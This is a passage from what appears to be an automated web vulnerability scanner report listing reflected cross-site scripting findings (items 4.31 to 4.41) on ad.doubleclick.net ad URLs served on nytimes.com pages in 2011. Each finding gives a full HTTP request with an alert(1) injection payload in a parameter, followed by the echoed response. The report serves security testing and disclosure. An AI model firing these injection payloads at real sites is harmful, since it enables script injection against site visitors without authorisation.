Cache-Control: private, x-gzip-ok=""
Content-Length: 6461

document.write('\r\r\n\r\r\n<script src=\"http://s0.2mdn.
...[SNIP]...
v8/3b05/7/10c/%2a/n%3B239192403%3B0-0%3B0%3B61866713%3B3454-728/90%3B41392052/41409839/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt158541A261966%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=gotod6f64'-alert(1)-'07e837f5fb5&opzn&page=blog.nytimes.com/dealbook/post&pos=TopAd&camp=UNUM_2011_1698712-nyt1&ad=UNUM_728x90_B5299202.3&sn2=1952ca62/2ca30cc&snr=doubleclick&snx=1305199279&sn1=1e601a2d/cdea53cb&goto=http://www.unum.
...[SNIP]...

4.31. http://ad.doubleclick.net/adj/N4031.276948.NYTIMES.COM/B5299202.3 [sz parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N4031.276948.NYTIMES.COM/B5299202.3

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1f6b3"-alert(1)-"32d83a54c1 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N4031.276948.NYTIMES.COM/B5299202.3;sz=728x90;pc=nyt158541A261966;ord=2011.05.12.11.38.07;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto1f6b3"-alert(1)-"32d83a54c1&opzn&page=blog.nytimes.com/dealbook/post&pos=TopAd&camp=UNUM_2011_1698712-nyt1&ad=UNUM_728x90_B5299202.3&sn2=1952ca62/2ca30cc&snr=doubleclick&snx=1305199279&sn1=1e601a2d/cdea53cb&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/2011/05/03/private-equity-titans-finds-common-ground/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:39:49 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6457

document.write('\r\r\n\r\r\n<script src=\"http://s0.2mdn.
...[SNIP]...
v8/3b05/7/10b/%2a/n%3B239192403%3B0-0%3B0%3B61866713%3B3454-728/90%3B41392052/41409839/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt158541A261966%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto1f6b3"-alert(1)-"32d83a54c1&opzn&page=blog.nytimes.com/dealbook/post&pos=TopAd&camp=UNUM_2011_1698712-nyt1&ad=UNUM_728x90_B5299202.3&sn2=1952ca62/2ca30cc&snr=doubleclick&snx=1305199279&sn1=1e601a2d/cdea53cb&goto=http://www.unum.
...[SNIP]...

4.32. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.13 [ad parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N5364.nytimes/B5378238.13

Issue detail

The value of the ad request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 760ef'-alert(1)-'f6235b48eb5 was submitted in the ad parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N5364.nytimes/B5378238.13;sz=300x250;pc=nyt160964A265018;ord=2011.05.12.11.15.46;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=MiddleRight&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart300x250760ef'-alert(1)-'f6235b48eb5&sn2=4deeed34/c8e8c4bb&snr=doubleclick&snx=1305198667&sn1=ef2b314b/be015cda&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topics/mergers-acquisitions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:17:27 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6766

document.write('\n\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=MiddleRight&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart300x250760ef'-alert(1)-'f6235b48eb5&sn2=4deeed34/c8e8c4bb&snr=doubleclick&snx=1305198667&sn1=ef2b314b/be015cda&goto=http://newsroom.intel.com/community/intel_newsroom/blog/2011/05/04/intel-reinvents-transistors-using-new-3-d-structure?d
...[SNIP]...

4.33. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.13 [ad parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N5364.nytimes/B5378238.13

Issue detail

The value of the ad request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a9fe6"-alert(1)-"fa3faa6ea46 was submitted in the ad parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N5364.nytimes/B5378238.13;sz=300x250;pc=nyt160964A265018;ord=2011.05.12.11.15.46;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=MiddleRight&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart300x250a9fe6"-alert(1)-"fa3faa6ea46&sn2=4deeed34/c8e8c4bb&snr=doubleclick&snx=1305198667&sn1=ef2b314b/be015cda&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topics/mergers-acquisitions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:17:23 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6766

document.write('\n\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=MiddleRight&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart300x250a9fe6"-alert(1)-"fa3faa6ea46&sn2=4deeed34/c8e8c4bb&snr=doubleclick&snx=1305198667&sn1=ef2b314b/be015cda&goto=http://newsroom.intel.com/community/intel_newsroom/blog/2011/05/04/intel-reinvents-transistors-using-new-3-d-structure?d
...[SNIP]...

4.34. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.13 [camp parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N5364.nytimes/B5378238.13

Issue detail

The value of the camp request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a5909"-alert(1)-"a7ebfd9570c was submitted in the camp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N5364.nytimes/B5378238.13;sz=300x250;pc=nyt160964A265018;ord=2011.05.12.11.15.46;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=MiddleRight&camp=Intel_US11q2CORMGCorp-1691749-nyt2a5909"-alert(1)-"a7ebfd9570c&ad=US11q2CORMGCorp.Dealbook.dart300x250&sn2=4deeed34/c8e8c4bb&snr=doubleclick&snx=1305198667&sn1=ef2b314b/be015cda&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topics/mergers-acquisitions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:17:11 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6766

document.write('\n\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
3B%7Eokv%3D%3Bpc%3Dnyt160964A265018%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=MiddleRight&camp=Intel_US11q2CORMGCorp-1691749-nyt2a5909"-alert(1)-"a7ebfd9570c&ad=US11q2CORMGCorp.Dealbook.dart300x250&sn2=4deeed34/c8e8c4bb&snr=doubleclick&snx=1305198667&sn1=ef2b314b/be015cda&goto=http://newsroom.intel.com/community/intel_newsroom/blog/2011/05/04/intel-reinven
...[SNIP]...

4.35. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.13 [camp parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N5364.nytimes/B5378238.13

Issue detail

The value of the camp request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 97db5'-alert(1)-'4e226fa9882 was submitted in the camp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N5364.nytimes/B5378238.13;sz=300x250;pc=nyt160964A265018;ord=2011.05.12.11.15.46;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=MiddleRight&camp=Intel_US11q2CORMGCorp-1691749-nyt297db5'-alert(1)-'4e226fa9882&ad=US11q2CORMGCorp.Dealbook.dart300x250&sn2=4deeed34/c8e8c4bb&snr=doubleclick&snx=1305198667&sn1=ef2b314b/be015cda&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topics/mergers-acquisitions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:17:15 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6766

document.write('\n\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
3B%7Eokv%3D%3Bpc%3Dnyt160964A265018%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=MiddleRight&camp=Intel_US11q2CORMGCorp-1691749-nyt297db5'-alert(1)-'4e226fa9882&ad=US11q2CORMGCorp.Dealbook.dart300x250&sn2=4deeed34/c8e8c4bb&snr=doubleclick&snx=1305198667&sn1=ef2b314b/be015cda&goto=http://newsroom.intel.com/community/intel_newsroom/blog/2011/05/04/intel-reinven
...[SNIP]...

4.36. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.13 [goto parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N5364.nytimes/B5378238.13

Issue detail

The value of the goto request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8a57a'-alert(1)-'b094c8c4161 was submitted in the goto parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N5364.nytimes/B5378238.13;sz=300x250;pc=nyt160964A265018;ord=2011.05.12.11.15.46;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=MiddleRight&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart300x250&sn2=4deeed34/c8e8c4bb&snr=doubleclick&snx=1305198667&sn1=ef2b314b/be015cda&goto=8a57a'-alert(1)-'b094c8c4161 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topics/mergers-acquisitions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:18:30 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6766

document.write('\n\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
log.nytimes.com/dealbook&pos=MiddleRight&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart300x250&sn2=4deeed34/c8e8c4bb&snr=doubleclick&snx=1305198667&sn1=ef2b314b/be015cda&goto=8a57a'-alert(1)-'b094c8c4161http://newsroom.intel.com/community/intel_newsroom/blog/2011/05/04/intel-reinvents-transistors-using-new-3-d-structure?dfaid=1&crtvid=41996799;\">
...[SNIP]...

4.37. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.13 [goto parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N5364.nytimes/B5378238.13

Issue detail

The value of the goto request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5f305"-alert(1)-"afeb150ce3f was submitted in the goto parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N5364.nytimes/B5378238.13;sz=300x250;pc=nyt160964A265018;ord=2011.05.12.11.15.46;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=MiddleRight&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart300x250&sn2=4deeed34/c8e8c4bb&snr=doubleclick&snx=1305198667&sn1=ef2b314b/be015cda&goto=5f305"-alert(1)-"afeb150ce3f HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topics/mergers-acquisitions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:18:26 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6766

document.write('\n\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
log.nytimes.com/dealbook&pos=MiddleRight&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart300x250&sn2=4deeed34/c8e8c4bb&snr=doubleclick&snx=1305198667&sn1=ef2b314b/be015cda&goto=5f305"-alert(1)-"afeb150ce3fhttp://newsroom.intel.com/community/intel_newsroom/blog/2011/05/04/intel-reinvents-transistors-using-new-3-d-structure?dfaid=1&crtvid=41996799;");
var fscUrl = url;
var fscUrlClickTagFound = false;
var
...[SNIP]...

4.38. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.13 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N5364.nytimes/B5378238.13

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9518e'-alert(1)-'46a7facb548 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N5364.nytimes/B5378238.13;sz=300x250;pc=nyt160964A265018;ord=2011.05.12.11.15.46;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=MiddleRight&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart300x250&sn2=4deeed34/c8e8c4bb&snr=doubleclick&snx=1305198667&sn1=ef2b314b/be015cda&goto=&9518e'-alert(1)-'46a7facb548=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topics/mergers-acquisitions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:18:51 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6778

document.write('\n\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
og.nytimes.com/dealbook&pos=MiddleRight&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart300x250&sn2=4deeed34/c8e8c4bb&snr=doubleclick&snx=1305198667&sn1=ef2b314b/be015cda&goto=&9518e'-alert(1)-'46a7facb548=1http://newsroom.intel.com/community/intel_newsroom/blog/2011/05/04/intel-reinvents-transistors-using-new-3-d-structure?dfaid=1&crtvid=41996799;\">
...[SNIP]...

4.39. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.13 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N5364.nytimes/B5378238.13

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f24ed"-alert(1)-"8ce055443cf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N5364.nytimes/B5378238.13;sz=300x250;pc=nyt160964A265018;ord=2011.05.12.11.15.46;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=MiddleRight&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart300x250&sn2=4deeed34/c8e8c4bb&snr=doubleclick&snx=1305198667&sn1=ef2b314b/be015cda&goto=&f24ed"-alert(1)-"8ce055443cf=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topics/mergers-acquisitions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:18:47 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6778

document.write('\n\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
og.nytimes.com/dealbook&pos=MiddleRight&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart300x250&sn2=4deeed34/c8e8c4bb&snr=doubleclick&snx=1305198667&sn1=ef2b314b/be015cda&goto=&f24ed"-alert(1)-"8ce055443cf=1http://newsroom.intel.com/community/intel_newsroom/blog/2011/05/04/intel-reinvents-transistors-using-new-3-d-structure?dfaid=1&crtvid=41996799;");
var fscUrl = url;
var fscUrlClickTagFound = false;
v
...[SNIP]...

4.40. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.13 [opzn&page parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N5364.nytimes/B5378238.13

Issue detail

The value of the opzn&page request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7af86"-alert(1)-"e31326cfed3 was submitted in the opzn&page parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N5364.nytimes/B5378238.13;sz=300x250;pc=nyt160964A265018;ord=2011.05.12.11.15.46;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook7af86"-alert(1)-"e31326cfed3&pos=MiddleRight&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart300x250&sn2=4deeed34/c8e8c4bb&snr=doubleclick&snx=1305198667&sn1=ef2b314b/be015cda&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topics/mergers-acquisitions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:16:46 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6766

document.write('\n\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
%3B0%3B63131103%3B4307-300/250%3B41996799/42014586/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt160964A265018%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook7af86"-alert(1)-"e31326cfed3&pos=MiddleRight&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart300x250&sn2=4deeed34/c8e8c4bb&snr=doubleclick&snx=1305198667&sn1=ef2b314b/be015cda&goto=http://newsroom.intel.co
...[SNIP]...

4.41. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.13 [opzn&page parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N5364.nytimes/B5378238.13

Issue detail

The value of the opzn&page request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ebf52'-alert(1)-'3a8faa3de5c was submitted in the opzn&page parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N5364.nytimes/B5378238.13;sz=300x250;pc=nyt160964A265018;ord=2011.05.12.11.15.46;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbookebf52'-alert(1)-'3a8faa3de5c&pos=MiddleRight&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart300x250&sn2=4deeed34/c8e8c4bb&snr=doubleclick&snx=1305198667&sn1=ef2b314b/be015cda&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topics/mergers-acquisitions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
